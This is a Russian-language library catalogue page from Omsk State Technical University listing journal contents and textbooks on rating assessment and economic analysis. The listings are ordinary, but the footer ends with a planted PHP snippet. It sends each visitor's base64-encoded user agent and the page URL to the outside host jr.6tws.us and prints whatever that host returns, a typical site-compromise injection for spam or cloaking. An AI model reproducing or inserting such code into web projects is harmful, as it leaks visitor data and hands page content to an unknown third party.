Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

187 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ОЦЕНКА РЕЙТИНГОВАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Среднее профессиональное образование. - Журнал, 2014г. № 5(прил.)
Оглавление 
  • Федорова, О. Н. Сравнение студентов колледжа с учащимися общеобразовательной школы / О. Н. Федорова. - с.3-15
    Кл. слова: СТУДЕНТ КОЛЛЕДЖА, ШКОЛЬНИК
  • Сыпачева, Г. Ш. Инновационная развивающая среда как основа обеспечения интерактивного взаимодействия в формировании правовых компетенций / Г. Ш. Сыпачева. - с.15-22
    Кл. слова: СРЕДА ИННОВАЦИОННАЯ, КОМПЕТЕНЦИИ ПРАВОВЫЕ
  • Позднякова, У. С. Понятие анимационной деятельности, ее место в системе образования, воспитания и организационной культуры / У. С. Позднякова. - с.22-41
    Кл. слова: ДЕЯТЕЛЬНОСТЬ АНИМАЦИОННАЯ, АНИМАЦИЯ, ДОСУГ ДЕТЕЙ
  • Кузнецова, Г. В. Методическая разработка блока теоретических занятий по информатике / Г. В. Кузнецова. - с.42-74
    Кл. слова: РАЗРАБОТКА МЕТОДИЧЕСКАЯ, ИНФОРМАТИКА
  • Мирхасанов, Р. Ф. Развитие композиционного видения для решения учебных задач при выполнении натурных постановок / Р. Ф. Мирхасанов. - с.74-79
    Кл. слова: ВИДЕНИЕ КОМПОЗИЦИОННОЕ, ПОСТАНОВКА НАТУРНАЯ
  • Авдеев А. А,. Интерактивные технологии на уроках иностранного языка с использованием доски Smart Board / А. А, Авдеев. - с.79-82
    Кл. слова: ТЕХНОЛОГИИ ИНТЕРАКТИВНЫЕ, ПРЕПОДАВАНИЕ ИНОСТРАННОГО ЯЗЫКА
  • Журавлева, Т. Е. Методы объективной диагностики эмоциональной сферы учащихся / Т. Е. Журавлева. - с.83-100
    Кл. слова: ЭМОЦИИ, НАСТРОЕНИЕ, ДИАГНОСТИКА ЭМОЦИОНАЛЬНОЙ СФЕРЫ
  • Карама, Л. Л. Кризисные ситуации у детей, подвергшихся домашнему насилию в семье, как объект социальной работы / Л. Л. Карама. - с.101-103
    Кл. слова: НАСИЛИЕ ФИЗИЧЕСКОЕ
  • Птущенко, Н. С. Трудные родители! / Н. С. Птущенко. - с.104-109
    Кл. слова: РОДИТЕЛИ
  • Назарова, Д. Т. Применение технологии развития критического мышления на учебных занятиях по биологии / Д. Т. Назарова. - с.113-118
    Кл. слова: МЫШЛЕНИЕ КРИТИЧЕСКОЕ, БИОЛОГИЯ
  • Калинкина, С. С. Интерактивные технологии в подготовке поваров и кондитеров / С. С. Калинкина. - с.118-124
    Кл. слова: ТЕХНОЛОГИИ ИНТЕРАКТИВНЫЕ, ПОДГОТОВКА ПОВАРОВ, ПОДГОТОВКА КОНДИТЕРОВ
  • Рязанова, А. С. Опыт разработки комплекта контрольно-оценочных средств по учебной дисциплине "Естествознание" / А. С. Рязанова. - с.125-142
    Кл. слова: ВИКТОРИНА, МЕХАНИКА, ОЦЕНКА РЕЙТИНГОВАЯ
  • Давыдова, О. Н. Сценарий внеаудиторного занятия по информатике и ИКТ / О. Н. Давыдова. - с.143-152
    Кл. слова: ЗАНЯТИЕ ВНЕАУДИТОРНОЕ, ИНФОРМАТИКА И ИКТ
Держатели документа (Информация об экземплярах) 
2. 
Высшее образование в России. - Журнал, 2015г. № 1
Оглавление 
  • Белоцерковский, А. В. Вузы как генераторы регионального развития / А. В. Белоцерковский. - с.5-10
    Кл. слова: ВУЗ РЕГИОНАЛЬНЫЙ, РАЗВИТИЕ РЕГИОНАЛЬНОЕ, ЕГЭ
  • Елина, Е. Г. Компетенции и результаты обучения: логика представления в образовательных программах / Е. Г. Елина, Е. Н. Ковтун, С. Е. Родионова. - с.10-20
    Кл. слова: ФГОС ВПО, ОБРАЗОВАНИЕ ФИЛОЛОГИЧЕСКОЕ, РЕЗУЛЬТАТ ОБУЧЕНИЯ
  • Ким, И. Н. Будущее регионального вуза в контексте стратегии развития отечественного образования / И. Н. Ким. - с.20-29
    Кл. слова: ВУЗ РЕГИОНАЛЬНЫЙ, КОМПЛЕКС УНИВЕРСИТЕТСКИЙ, МЕНЕДЖМЕНТ УНИВЕРСИТЕТСКИЙ
  • Андреев, А. А. Гуманитарный цикл в техническом вузе и интеллектуальные среды / А. А. Андреев. - с.30-36
    Кл. слова: ОБРАЗОВАНИЕ ИНЖЕНЕРНОЕ, ЗНАНИЕ ГУМАНИТАРНОЕ
  • Красинская, Л. Ф. Преподаватель высшей школы: каким ему быть? (Размышления о социальных ожиданиях и профессиональных реалиях) / Л. Ф. Красинская. - с.37-46
    Кл. слова: КОМПЕТЕНТНОСТЬ ПРЕПОДАВАТЕЛЯ, ПОЛИТИКА ОБРАЗОВАТЕЛЬНАЯ, БЮРОКРАТИЗАЦИЯ ВУЗА
  • Стародубцев, В. А. Педагогическая поддержка профессионального самоопределения студентов в вузе / В. А. Стародубцев, М. А. Соловьев, Е. Ю. Валитова. - с.47-56
    Кл. слова: САМООПРЕДЕЛЕНИЕ ПРОФЕССИОНАЛЬНОЕ, ИНДИВИДУАЛИЗАЦИЯ ОБРАЗОВАНИЯ, ПЕРСОНИФИКАЦИЯ ОБРАЗОВАНИЯ
  • Полонников, А. А. К вопросу о политиках знания в современном университете / А. А. Полонников. - с.61-70
    Кл. слова: ЭПИСТЕМОЛОГИЯ, ЛОГИСТИКА ПЕДАГОГИЧЕСКАЯ, ДИЕТОЛОГИЯ ПЕДАГОГИЧЕСКАЯ
  • Король, Д. Ю. Образование в контексте современности (заметки к проекту исследований) / Д. Ю. Король. - с.70-75
    Кл. слова: ОБРАЗОВАНИЕ УНИВЕРСИТЕТСКОЕ, КОНФЛИКТ КОММУНИКАТИВНО-ЛИНГВИСТИЧЕСКИЙ, КОД ИКОНИЧЕСКИЙ
  • Гусаковский, М. А. О воспитании в современном университете: смена правил игры / М. А. Гусаковский. - с.76-86
    Кл. слова: ДИСКУРС ВОСПИТАНИЯ, ВОСПИТАНИЕ ЛИЧНОСТНО-ОРИЕНТИРОВАННОЕ
  • Корбут, А. М. Академическое сопротивление в университете: попытка концептуализации / А. М. Корбут. - с.86-94
    Кл. слова: СОПРОТИВЛЕНИЕ АКАДЕМИЧЕСКОЕ, ПРАКТИКА ОБРАЗОВАТЕЛЬНАЯ, ПРАГМАТИЗМ ИНСТИТУЦИОНАЛЬНЫЙ
  • Лазаренко, В. А. Курский государственный медицинский университет: прошлое и настоящее / В. А. Лазаренко. - с.97-103
    Кл. слова: УНИВЕРСИТЕТ МЕДИЦИНСКИЙ, ЮБИЛЕЙ УНИВЕРСИТЕТА
  • Конопля, Е. Ф. Методологические принципы реализации компетентностного подхода в вузе / Е. Ф. Конопля, Т. Д. Василенко. - с.103-108
    Кл. слова: ПОДХОД КОМПЕТЕНТНОСТНЫЙ, МОДЕЛЬ КОМПЕТЕНТНОСТНАЯ
  • Калуцкий, П. В. КГМУ: опыт организации научно-исследовательской деятельности / П. В. Калуцкий. - с.109-114
    Кл. слова: УНИВЕРСИТЕТ МЕДИЦИНСКИЙ, ДЕЯТЕЛЬНОСТЬ НАУЧНО-ИССЛЕДОВАТЕЛЬСКАЯ, ОБЩЕСТВО НАУЧНОЕ СТУДЕНЧЕСКОЕ
  • Охотников, О. И. Непрерывное медицинское и фармацевтическое образование / О. И. Охотников, И. Г. Комиссинская. - с.114-119
    Кл. слова: ОБРАЗОВАНИЕ ФАРМАЦЕВТИЧЕСКОЕ, ОБРАЗОВАНИЕ НЕПРЕРЫВНОЕ
  • Олейникова, Т. А. Система менеджмента качества как современный подход к управлению образованием / Т. А. Олейникова, А. И. Овод, В. А. Солянина. - с.119-126
    Кл. слова: МЕНЕДЖМЕНТ КАЧЕСТВА ОБРАЗОВАНИЯ, КАЧЕСТВО ОБРАЗОВАНИЯ, ОЦЕНКА РЕЙТИНГОВАЯ
  • Дрёмова, Н. Б. Формирование педагогического мастерства преподавателя вуза / Н. Б. Дрёмова, А. И. Конопля. - с.127-132
    Кл. слова: МАСТЕРСТВО ПЕДАГОГИЧЕСКОЕ, ПЕДАГОГИКА ВЫСШЕЙ ШКОЛЫ, ТРЕНИНГ
  • Шульгина, Т. А. Социокультурная среда вуза как объект управления / Т. А. Шульгина. - с.132-136
    Кл. слова: СРЕДА СОЦИОКУЛЬТУРНАЯ, ПОДХОД КОМПЕТЕНТНОСТНЫЙ
  • Болдырева, Л. В. 75-летний путь от колледжа к вузу / Л. В. Болдырева. - с.137-139
    Кл. слова: КОЛЛЕДЖ МЕДИКО-ФАРМАЦЕВТИЧЕСКИЙ, ЮБИЛЕЙ КОЛЛЕДЖА
  • Осипов, П. Н. Глобализация как фактор саморазвития студентов / П. Н. Осипов, Ю. Н. Зиятдинова. - с.140-145
    Кл. слова: ИНТЕРНАЦИОНАЛИЗАЦИЯ ОБРАЗОВАНИЯ, САМОВОСПИТАНИЕ, САМОРАЗВИТИЕ СТУДЕНТА
  • Резник, С. Д. Кто научит студента жить? / С. Д. Резник. - с.146-151
    Кл. слова: СТУДЕНЧЕСТВО, КОНКУРЕНТООРИЕНТИРОВАННОСТЬ, УСТОЙЧИВОСТЬ СОЦИАЛЬНАЯ
  • Онлайн-образование врача: ограничения конвертации культурного капитала. - с.152-158
    Кл. слова: ОНЛАЙН - ОБРАЗОВАНИЕ, e-Learning, ОБРАЗОВАНИЕ ИНФОРМАЛЬНОЕ
  • Бубнов, Г. Г. Опыт внедрения инновационных информационных технологий в образовательную деятельность / Г. Г. Бубнов, Е. В. Никульчев, Е. В. Плужник. - с.159-161
    Кл. слова: ДЕЯТЕЛЬНОСТЬ ОБРАЗОВАТЕЛЬНАЯ, ТЕХНОЛОГИИ ИНФОРМАЦИОННЫЕ, ОБРАЗОВАНИЕ - ИННОВАЦИИ
  • Задорожнюк, И. Е. "Рейтинг" - слово мобилизующее или дезориентирующее? / И. Е. Задорожнюк. - с.162-166
    Кл. слова: РЕЙТИНГОВАНИЕ, ДИСКРИМИНАЦИЯ ИНФОРМАЦИОННАЯ
3. 
Среднее профессиональное образование. - Журнал, 2011г. № 3
Оглавление 
  • Травкина, Н. Н. К вопросу о развитии инновационного потенциала учреждений профессионального образования / Н. Н. Травкина, А. В. Ананьев. - с.6-9
    Кл. слова: РЕЙТИНГ ОБРАЗОВАТЕЛЬНЫХ УЧРЕЖДЕНИЙ, ОЦЕНКА РЕЙТИНГОВАЯ, ОБРАЗОВАНИЕ ПРОФЕССИОНАЛЬНОЕ
  • Герасимова, М. П. Ресурсы и механизмы устойчивого развития системы непрерывного профессионального управленческого образования / ; М. П. ГЕрасимова. - с.12-13
    Кл. слова: ОБРАЗОВАНИЕ НЕПРЕРЫВНОЕ, ОБРАЗОВАНИЕ УПРАВЛЕНЧЕСКОЕ
  • Грибанова, Н. ВА. Общественно-государственное управление инновационным развитием (опыт проектирования сетевого взаимодействия в профессиональном образовании Республики Карелия ) / ; Н. ВА. Грибанова. - с.14-17
    Кл. слова: ВЗАИМОДЕЙСТВИЕ СЕТЕВОЕ, РАЗВИТИЕ ИННОВАЦИОННОЕ, ОБРАЗОВАНИЕ СРЕДНЕЕ ПРОФЕССИОНАЛЬНОЕ
  • Вертиль, В. В. Оптимизационное моделирование управления развитием конкурентоспособности учреждений среднего профессионального образования / В. В. Вертиль. - с.17-19
    Кл. слова: УПРАВЛЕНИЕ ОБРАЗОВАНИЕМ, ОБРАЗОВАНИЕ СРЕДНЕЕ ПРОФЕССИОНАЛЬНОЕ, КОНКУРЕНТОСПОСОБНОСТЬ СПО
  • Рянжина, М. Н. Толерантность как феномен культуры, социальной действительности и воспитания / М. Н. Рянжина. - с.23-25
    Кл. слова: ОБРАЗОВАНИЕ ПРОФЕССИОНАЛЬНОЕ, КУЛЬТУРА ОБЩЕНИЯ, ОБЩЕНИЕ ТОЛЕРАНТНОЕ
  • Курманова, Э. А. Инновационная стратегия развития колледжа / Э. А. Курманова. - с.28-30
    Кл. слова: КАЧЕСТВО ОБРАЗОВАНИЯ - СПО, МОДЕРНИЗАЦИЯ ОБРАЗОВАНИЯ, МОНИТОРИНГ КАЧЕСТВА ОБРАЗОВАНИЯ
  • Вовси-Тиллье, Л. А. Модульно-компетентностная технология / Л. А. Вовси-Тиллье. - с.30-31
    Кл. слова: КОМПЕТЕНЦИЯ - ОБРАЗОВАНИЕ, ПОДХОД МОДУЛЬНО-КОМПЕТЕНТНОСТНЫЙ
  • Ваганова, Н. О. Практико-ориентированная среда как производственно-образовательное пространство / Н. О. Ваганова. - с.33-36
    Кл. слова: СРЕДА ПРАКТИКО-ОРИЕНТИРОВАННАЯ, КОМПЕТЕНЦИЯ ПРОФЕССИОНАЛЬНАЯ, ОБРАЗОВАНИЕ СРЕДНЕЕ ПРОФЕССИОНАЛЬНОЕ
  • Кучерявенко, С. В. Системный подход в диагностике педагогического процесса / С. В. Кучерявенко. - с.36-38
    Кл. слова: АНАЛИЗ СИСТЕМНЫЙ, ДИАГНОСТИКА ПЕДАГОГИЧЕСКАЯ, ПРОЦЕСС ПЕДАГОГИЧЕСКИЙ
  • Ханукаева, О. Ю. Содержание нормативно-управленческой культуры и способы формирования у студентов экономического профиля / О. Ю. Ханукаева. - с.44-46
    Кл. слова: КУЛЬТУРА УПРАВЛЕНЧЕСКАЯ, ТЕХНОЛОГИИ ЛИЧНОСТНО-ОРИЕНТИРОВАННЫЕ, ТЕХНОЛОГИИ ПРАКТИКО-ОРИЕНТИРОВАННЫЕ
  • Георге, И. В. Некоторые аспекты разработки программы самостоятельной работы студентов, направленной на формирование профессиональной компетентности / И. В. Георге. - с.49-51
    Кл. слова: РАБОТА СТУДЕНТА САМОСТОЯТЕЛЬНАЯ, ПОДХОД ИНДИВИДУАЛЬНЫЙ, КОМПЕТЕНТНОСТЬ ПРОФЕССИОНАЛЬНАЯ
  • Дуброва, Т. И. Технология уровневой дифференциации в подготовке конкурентоспособного специалиста / Т. И. Дуброва. - с.51-54
    Кл. слова: КОНКУРЕНТОСПОСОБНОСТЬ ВЫПУСКНИКА, ДИФФЕРЕНЦИАЦИЯ УРОВНЕВАЯ, ПОДГОТОВКА ПРОФЕССИОНАЛЬНАЯ
  • Хаертдинов, Р. Р. Роль здоровьесберегающих технологий в формировании эмпатической культуры личности будущих специалистов / Р. Р. Хаертдинов. - с.60-61
    Кл. слова: ТЕХНОЛОГИИ ЗДОРОВЬЕСБЕРЕГАЮЩИЕ, КУЛЬТУРА ЭМПАТИЧЕСКАЯ, СПО - РАЗВИТИЕ ИННОВАЦИОННОЕ
Держатели документа (Информация об экземплярах) 
4. 
Баканов М. И. Теория экономического анализа [Текст] / М. И. Баканов, А. Д. Шеремет, 1994. - 285 с.
Ключевые слова 
АНАЛИЗ ЭКОНОМИЧЕСКИЙ -- ТЕОРИЯ ПОЗНАНИЯ -- АНАЛИЗ ЭКОНОМИЧЕСКИЙ - ИСТОРИЯ -- ОБЕСПЕЧЕНИЕ ИНФОРМАЦИОННОЕ -- АНАЛИЗ ХОЗЯЙСТВЕННОЙ ДЕЯТЕЛЬНОСТИ -- МЕТОДЫ ЭКОНОМИКО-МАТЕМАТИЧЕСКИЕ -- АНАЛИЗ КОРРЕЛЯЦИОННЫЙ -- ПРОГРАММИРОВАНИЕ ЛИНЕЙНОЕ -- ПРОГРАММИРОВАНИЕ ДИНАМИЧЕСКОЕ -- ТЕОРИЯ ИГР -- ТЕОРИЯ МАССОВОГО ОБСЛУЖИВАНИЯ -- МЕТОД АНАЛИЗА МАТРИЧНЫЙ -- АНАЛИЗ ФУНКЦИОНАЛЬНО-СТОИМОСТНЫЙ -- АНАЛИЗ КОМПЛЕКСНЫЙ -- АНАЛИЗ ПРОИЗВОДСТВЕННО-ФИНАНСОВОЙ ДЕЯТЕЛЬНОСТИ -- ОЦЕНКА РЕЙТИНГОВАЯ
Держатели документа (Информация об экземплярах) 
5. 
Чернышева Ю. Г. Анализ финансово-хозяйственной деятельности предприятия [Текст] : Учеб. пособие для вузов по экон. специальностям / Ю. Г. Чернышева, Э. А. Чернышев, 2003. - 299, [1] с.

Учебное пособие состоит из четырех глав. В первой главе рассматриваются наиболее универсальные и широко применяемые на практике экономико-математические методы и модели, включающие отраслевой <балансовый метод>, рассматриваются методы <оптимального планирования>, основанные на теории математического программирования; математико-статистические методы, в том числе <факторный анализ>, <корреляционные методы>; рассмотрено описание методов <сетевого планирования>. Также приведены примеры решения некоторых экономических задач с помощью экономико-математических методов. Вторая и третья главы посвящены анализу финансового состояния <предприятия>, включающему анализ <ликвидности> и <платежеспособности>, анализ <финансовой устойчивости>, анализ <рентабельности>, анализ положения на рынке капиталов. Также раскрыта сущность и обобщающие показатели эффективности производства на предприятии, две современные аналитические модели анализа производственно-хозяйственной деятельности предприятия: аддитивная и дескриптивная. В четвертой главе рассмотрен порядок составления <бизнес-плана> финансового оздоровления предприятия.

6. 
Баканов, Михаил Иванович. Теория экономического анализа [Текст] : Учеб. для вузов по направлению "Экономика", спец. "Бухгалт. учет, контроль и анализ хоз. деятельности" / М. И. Баканов, А. Д. Шеремет, 1995. - 285 с.
Ключевые слова 
Экономический анализ -- Анализ хозяйственной деятельности -- Экономическая теория -- Экономика -- АНАЛИЗ ХОЗЯЙСТВЕННОЙ ДЕЯТЕЛЬНОСТИ -- МЕТОДЫ ЭКОНОМИКО-МАТЕМАТИЧЕСКИЕ -- АНАЛИЗ КОРРЕЛЯЦИОННЫЙ -- ПРОГРАММИРОВАНИЕ ЛИНЕЙНОЕ -- ПРОГРАММИРОВАНИЕ ДИНАМИЧЕСКОЕ -- ТЕОРИЯ ИГР -- ТЕОРИЯ МАССОВОГО ОБСЛУЖИВАНИЯ -- МЕТОД АНАЛИЗА МАТРИЧНЫЙ -- АНАЛИЗ ФУНКЦИОНАЛЬНО-СТОИМОСТНЫЙ -- АНАЛИЗ КОМПЛЕКСНЫЙ -- АНАЛИЗ ПРОИЗВОДСТВЕННО-ФИНАНСОВОЙ ДЕЯТЕЛЬНОСТИ -- ОЦЕНКА РЕЙТИНГОВАЯ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3180 - 23.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.01 с.18 запросов, 0.72c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;